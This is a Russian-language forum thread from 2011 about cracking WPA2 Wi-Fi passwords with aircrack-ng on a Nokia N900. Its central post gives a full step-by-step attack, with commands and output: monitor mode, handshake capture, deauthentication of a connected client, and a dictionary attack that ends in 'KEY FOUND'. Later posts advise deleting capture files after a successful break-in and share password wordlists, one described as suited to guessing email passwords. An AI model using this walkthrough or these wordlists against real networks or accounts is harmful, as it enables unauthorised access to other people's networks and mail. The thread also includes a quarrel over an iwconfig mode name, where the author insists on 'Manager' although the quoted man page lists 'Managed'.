91

Re: aircrack

Ну, например, от этого сайта smile
http://imageplay.net/img/m7Gbd124185/shot2.png
Правда, тут есть логин по OpenID, если провайдер OpenID поддерживает шифрование, то хорошо smile

Добавлено: 18.01.2011 15:43:31

Насчёт почты не знаю, наверное, да.

A mammal should be able to hunt mice, hibernate, fly, chew its cud, echolocate, invent tools, lay eggs, burrow. Speciation is for insects.

Поделиться

92

Re: aircrack

Dominic пишет:

А ты хочешь посимвольный подбор по буквам маленьким или по большим, или по тем и другим, и цифры добавлять со знаками препинания???

Ну давай допустим у тебя будет пароль ololo3
Вот через сколько он его подберет интересно?

Поделиться

93

Re: aircrack

Dan9I пишет:

Ну давай допустим у тебя будет пароль ololo3
Вот через сколько он его подберет интересно?

Пароль сплошным перебором состоящий из 6 знаков включающих в себя буквы малые, большие, цифры, знаки препинания на частоте 500 занимает 4 дня, на частоте 1100 - 42 часа

Это теоретический расчет... На практике должно быть меньше... Попробую...  big_smile

Поделиться

94 (18.01.2011 19:33:00 отредактировано Dominic)

Re: aircrack

По информации из сети: WPA можно взломать только методом прямого перебора. Это связанно с отсутствием постоянного ключа. Единственный способ получить нужную информацию – начать перехват пакетов в момент установки соединения между клиентом и AP. Длина PSK может составлять от 8 до 63 символов, и чем она больше, тем меньше вероятность успешного взлома.
Но для оптимистов и энтузиастов информация выложенная на этом форуме ниже может быть интересной и поучительной...

Итак имеем цель:
Подключиться к Wi-Fi точке использующей WPA2 PSK

Средства для достижения цели:
1. Атакуемый клиент с WPA2 (Wi-Fi точка, в радиусе действия нашего N900 причем не на получение, а на передачу сигнала точке для генерации атаки;
2. МАС клиента: 00:21:91:98:64:C4
3. N900 (с установленным пакетом rootsh, aircrack-ng 1.0);
4. password.lst список паролей по которым будет осуществляться собственно сам подбор пароля;

В случае, если ключ является словарным словом или же менее 8 символов, взлом возможен и не сложен.

Примечание: Отсюда, кстати, понятно, как создать неломаемую сеть – достаточно использовать WPA/WPA2 и ключ длиной 63 байта, состоящий из случайного набора букв, цифр и псевдосимволов.

Полный перебор – занятие долгое. Поскольку требуются серьезные вычисления, компьютер может проверять от 50 до 300 ключей в секунду, в зависимости от мощности процессора. N900 по заявкам знающих челов от 30 до 100 ключей в секунду. Перебор достаточно большого словаря может занять часы, если не дни, а если вы хотите сгенерировать свой собственный файл словаря, который включает в себя все комбинации букв, цифр и псевдосимволов, учтите следующую информацию:

1. Пароль сплошным перебором состоящий из 5 знаков включающих в себя буквы малые, большие, цифры, знаки препинания на частоте 500 Mhz занимает 74 минуты, на частоте 1100 Mhz - 34 минуты
2. Пароль сплошным перебором состоящий из 6 знаков включающих в себя буквы малые, большие, цифры, знаки препинания на частоте 500 Mhz занимает 4 дня, на частоте 1100 Mhz - 42 часа
3. Пароль сплошным перебором состоящий из 7 знаков включающих в себя буквы малые, большие, цифры, знаки препинания на частоте 500 Mhz занимает 10 месяцев, на частоте 1100 Mhz - 5 месяцев...
4.Пароль состоящий из 15 знаков, где есть буквы нижнего и верхнего регистра и цифры, перебором сплошным (без словаря) на частоте 1100 Mhz занял бы 22 473 277 478 161 лет!!!


1-й ШАГ подготовка...

$ root
# ifconfig wlan0 down

                - команда отключения или "падения" (кому как удобней на слух)  интерфейса wlan0

# iwconfig wlan0 mode Monitor

            - команда включение режима монитора wlan0

# ifconfig wlan0 up

                            - команда "поднятия" интерфейса wlan0


#arodump-ng wlan0

                - сканируем пространство на наличие действующих точек Wi-Fi их МАС и Ch

имеем следующий вывод в терминале:

CH  5 ][ Elapsed: 7 mins ][ 2011-01-18 17:04                                 
                                                                             
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSI
                                                                             
00:21:91:98:64:C4  -29      272        2    0  12  54e  WPA2 CCMP   PSK  DSL-
00:1E:58:A5:6F:80  -75      210        1    0   6  11   OPN              Leks
00:17:9A:09:D2:1E  -87      184      180    0  12  54 . WPA2 CCMP   PSK  SMKR
                                                                             
BSSID                          STATION                 PWR   Rate    Lost  Packets  Probes   
                                                                             
(not associated)        00:1F:3C:4A:7A:89  -83     0 - 1      0       14           
(not associated)        00:1E:58:A5:6F:80  -83     0 - 1      0        7           
00:17:9A:09:D2:1E   00:1F:D0:54:76:22   -1      5 - 0      0      128

Ctrl+C

  - останавливает выполнение команды arodump-ng wlan0

Мы видим, что наша атакуемая точка имеет

МАС 00:21:91:98:64:C4 Канал 12 Протокол WPA2 Имя DSL-2640U

Ниже мы так же наблюдаем отсутствие соединения с атакуемой точкой. Три подлючения указанные ниже относятся к другим точкам, которые нам не интересны на данный момент.

2-й ШАГ перехват пакетов с моментом установки безопасного соединения авторизованным пользователем с атакуемой точкой...

#airodump-ng -c 12 --bssid 00:21:91:98:64:C4 -w wpa wlan0

-c 12                 – это канал, на котором работает беспроводная сеть
--bssid 00:21:91:98:64:C4     – MAC адрес атакуемой точки. Этот параметр отфильтрует “левый” трафик от других точек в радиусе действия
-w wpa                 - имя файла, в который мы будут записываться пойманные пакеты
wlan0                 – имя нашего беспроводного интерфейса

После этого пошел перехват пакетов с записью их в файл wpa-01.cap...
Вывод будет примерно таков:

CH 12 ][ Elapsed: 25 mins ][ 2011-01-18 17:39 ][ WPA handshake: 00:21:91:98:6
                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH 
                                                                              
 00:21:91:98:64:C4  -35 100    14917     1229    0  12  54e  WPA2 CCMP   PSK  
                                                                              
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes    
                                                                              
 00:21:91:98:64:C4  00:24:2B:E9:6A:60  -61    1e-54e     0     1873     

Однако, проблема в том, что как в случае с ломанием кодировке WEP нам нужны пакеты именно с установкой безопасного соединения...

В нашем случае, я включаю нетбук и конекчусь к точке, предполагая, что я какой нибудь пользователь авторизованный...

Вывод на экране такого вида говорит нам, что к нашей сети подключился пользователь с МАС 00:24:2B:E9:6A:60 - это в принципе мой нетбук...

 
BSSID                        STATION                  PWR   Rate    Lost  Packets  Probes    
                                                                              
00:21:91:98:64:C4  00:24:2B:E9:6A:60  -61    1e-54e     0     1873     

Столбик #Data говорит нам о том, что пошел обмен пакетами с пользователем которые мы перехватили... Ниже Packets говорит о том, что именно этот пользователь (мой нетбук обменялся пакетами с точкой)...

Но вот вопрос... Поймали мы те пакеты где была собственно авторизация пользователя... А может мы начали перехват, когда он уже был подключен и авторизован... И дабы не ждать ни повторного подключения ни кого то еще, лучше сделаем атаку...

3-й ШАГ используем aireplay-ng, для отключения подсоединенного клиента (нетбука) и вынуждаем его заново пройти процедуру "аутентификации"

Для этого тапаем на вверх Терминала и выбираем СОЗДАТЬ...
В открывшемся новом окне терминала набираем следующее:

$ root
# aireplay-ng -0 5 -a 00:21:91:98:64:C4 -c 00:24:2B:E9:6A:60 wlan0

-0             - означает деаутентификацию
5             – количество деаутентификационных пакетов по умолчанию ставят 1 но у меня на 1 не прорезает, можно увеличить по своему усмотрению...
-a 00:21:91:98:64:C4     – MAC-адрес атакуемой точки
-c 00:24:2B:E9:6A:60     – MAC-адрес отсекаемого клиента, в нашем случае моего нетбука
wlan0             – имя нашей беспроводной карточки.

Вывод такой:

17:33:29  Waiting for beacon frame (BSSID: 00:21:91:98:64:C4) on channel 12
17:33:29  Sending 64 directed DeAuth. STMAC: [00:24:2B:E9:6A:60] [ 0| 0 ACKs]
17:33:30  Sending 64 directed DeAuth. STMAC: [00:24:2B:E9:6A:60] [ 0| 0 ACKs]
17:33:32  Sending 64 directed DeAuth. STMAC: [00:24:2B:E9:6A:60] [ 0| 1 ACKs]
17:33:33  Sending 64 directed DeAuth. STMAC: [00:24:2B:E9:6A:60] [ 1| 1 ACKs]
17:33:33  Sending 64 directed DeAuth. STMAC: [00:24:2B:E9:6A:60] [ 0| 0 ACKs]

Атака состоялась, повторная аутентификация прошла, пакеты пойманы
Теперь мы успокоились по поводу того что у нас все необходимые пакеты есть, а в нашем случае с избытком...
Останавливаем выполнение команды в первом терминале сочетанием клавиш Ctrl+C


4-й ШАГ запускаем aircrack-ng и ломаем PSK ключ

Цель данного шага – попытаться взломать PSK ключ путем подбора по словарю.
Небольшой словарик идет в комплекте с этим постом чисто для опыта password.lst, более объемные словари можно легко найти в сети или сгенерировать самостоятельно при помощи множества программ.

Примечание: Естественно, в этот маленький словарь эксперементальный, я включил свой реальный ключик... Цель-проверить работоспособность программы... Позже отпишусь по реальному взлому без известного пароля...

# aircrack-ng -w password.lst -b 00:21:91:98:64:C4 wpa*.cap

password.lst         -    собственно сам текстовый файлик с паролями в столбик с расширением lst находиться должен в папке /root, или в другой но тогда указывать полное имя /home/user/MyDocs/password.lst - я не пробовал этот вариант у меня лежит в /root
wpa*.cap        -    маска файла, который будет собственно и ломаться располагается опять же в /root
-b 00:21:91:98:64:C4    -    собственно к чему плдбираем авторизационный ключик

Вывод примерно таков:

Opening wpa-01.cap
Reading packets, please wait...


                                 Aircrack-ng 1.0


                   [00:00:00] 4 keys tested (34.92 k/s)


                       Current passphrase: ddF769viIwbeLnH            
                        KEY FOUND! [ ddF769viIwbeLnH ]
                        KEY FOUND! [ ddF769viIwbeLnH ]
      Master Key     : 38 41 96 0A 34 EF B0 EF 7E 6C 1E 63 9F EA 8A B2 
                       EF 1E 94 8D 61 E9 12 03 58 F1 81 05 F1 2B 25 17 

      Transient Key  : C6 C2 3B AE 0D F5 A3 F8 E6 B0 24 D3 C2 89 CD 39 
                       24 23 BC 77 E3 63 7B A4 A1 5B 0E ED E2 74 60 AE 
                       45 2B 38 EC F9 1C 08 BD 1F EB 02 BC E4 4E BD A9 
                       F9 2C A4 15 D0 BD F3 6C 9F 0E D9 29 5F 32 4C 0A 
      EAPOL HMAC     : 5F 0A A7 5F 7E 6F DD DB 44 87 85 F2 05 C6 B5 5D 

Ура!!! Мы взломали WPA2...

Совсем забыл... После взлома не забудьте перевести свою сетевую карточку в режим Manager

$ root
# ifconfig wlan0 down
# iwconfig wlan0 mode Manager
# ifconfig wlan0 up
Post's attachments

password.lst 364 b, 36 загрузок с 2011-01-18 

У Вас недостаточно прав для загрузки файлов, прикрепленных к этому сообщению.

95

Re: aircrack

Еще забыл сказать...
Если взлом произошел успешно, незабудьте почистить /root

в терминале вводим:
$ root
# mc


В МС заходим в папку /root хотя по умолчанию вы там и окажитесь и ищем файлы wpa-01.cap, wpa-01.csv, wpa-01.kismet.csv? wpa-01.kismet.netxml
Выделяем их зажатым Shift+Синяя стрелка и кнопочка вправа...
Жмем F8 и потом подтверждаем удаление...  big_smile

Поделиться

96 (19.01.2011 01:39:12 отредактировано Dan9I)

Re: aircrack

Надо бы включение и выключение WiFi в режим мониторинга в скриптик записать мелкий )
Dominic
Кстати, а как ты узнаешь мак адресс точки?Я скачал по WiFiEye, но она у меня не работает почему то sad
Не в режиме мониторинг, не в моддинг или как его там big_smile

Поделиться

97

Re: aircrack

Dan9I пишет:

Кстати, а как ты узнаешь мак адресс точки?

Это и есть 1-й шаг.

Добавлено: 19.01.2011 01:54:00

Dominic пишет:

Manager

Вообще-то, managed.

A mammal should be able to hunt mice, hibernate, fly, chew its cud, echolocate, invent tools, lay eggs, burrow. Speciation is for insects.

Поделиться

98 (19.01.2011 03:08:06 отредактировано Dominic)

Re: aircrack

Dan9I пишет:

Надо бы включение и выключение WiFi в режим мониторинга в скриптик записать мелкий )

Dominic


Честно говоря я скриптиком и включаю монитор и отключаю...
Но здесь решил его не приводить... Только запутаю людей начинающих... Да и команды руками вводить полезно... По крайней мере на первоначальном этапе...

Dan9I пишет:

Кстати, а как ты узнаешь мак адресс точки?Я скачал по WiFiEye, но она у меня не работает почему то sad
Не в режиме мониторинг, не в моддинг или как его там big_smile

А WiFiEye у тебя работать не будет пока... Ты же сам командами ifconfig wlan0 down и iwconfig wlan0 mode Monitor  "уронил" сетевой интерфейс и переключил его в МОНИТОР...

А нафига тебе WiFiEye???
Он же в режиме мониторинга при вводе команды: airodump-ng wlan0 - выдает тебе мак адреса точек в радиусе действия это первая часть таблицы... Вторая часть таблицы показывает, кто подключен к этим самым МАС адресам...

Добавлено: 19.01.2011 03:02:01

hxka пишет:

Вообще-то, managed.

Вообще то: Manager

Поделиться

99

Re: aircrack

Dominic, http://linux.die.net/man/8/iwconfig

The mode can be Ad-Hoc (network composed of only one cell and without Access Point), Managed (node connects to a network composed of many Access Points, with roaming), Master (the node is the synchronisation master or acts as an Access Point), Repeater (the node forwards packets between other wireless nodes), Secondary (the node acts as a backup master/repeater), Monitor (the node is not associated with any cell and passively monitor all packets on the frequency) or Auto.

A mammal should be able to hunt mice, hibernate, fly, chew its cud, echolocate, invent tools, lay eggs, burrow. Speciation is for insects.

Поделиться

100

Re: aircrack

hxka пишет:

Dominic, http://linux.die.net/man/8/iwconfig

я РУССКИЙ... Английского слова не понимаю... Еще раз говорю, при работе с программой в команде стоит Monitor или Manager... А если поставишь Managed - посмотри сам что получишь в ответ от системы...  big_smile

Поделиться

101

Re: aircrack

Эммм...
http://imageplay.net/m7Gbd124467/Screenshot_20110119_022211_thumb.jpg

Dominic пишет:

я РУССКИЙ... Английского слова не понимаю

Нашёл, чем гордиться.
http://manpages.ylsoftware.com/dokuwiki/man/iwconfig_8

A mammal should be able to hunt mice, hibernate, fly, chew its cud, echolocate, invent tools, lay eggs, burrow. Speciation is for insects.

Поделиться

102

Re: aircrack

Я не совсем понял... Ты добадаться решил или считаешь реально что между твоим Managed и моим Manager есть существенная разница при юзании этого метода... Уверен, что кроме Manager еще кучу всего можно будет туда вписать и будут работать... И что? Manager как режим работает-а больше мне и не нужно... А с твоим Managed у меня сеть не работает... Может конечно руки кривые, а может карма такая... В любом случае, мой вариант мне удобней чем твой...

Поделиться

103

Re: aircrack

Нашел в сети полезный password-list...
Русские слова набранные при английской раскладке клавиатуры...
По отзывам пользователей самый более-менее соответствующий из всех для подбора пороля к электронным почтам и прочему... Думаю для этой проги и WiFiTe сгодится в самый раз...  big_smile

Post's attachments

dictionary_rus_translit.zip 451.37 kb, 38 загрузок с 2011-01-19 

У Вас недостаточно прав для загрузки файлов, прикрепленных к этому сообщению.

Поделиться

104

Re: aircrack

Dominic буду тебе благодарен, если поделишься еще словарями smile

мой твиттер - https://twitter.com/SergeyGrim
мой ютюб канал http://www.youtube.com/MrSergeyGrim

Поделиться

105

Re: aircrack

Вот пасс лист сделал себе для брута WPA, в нем 6751803 различных паролей спец. для этого.
Делюсь с вами http://upwap.ru/1244121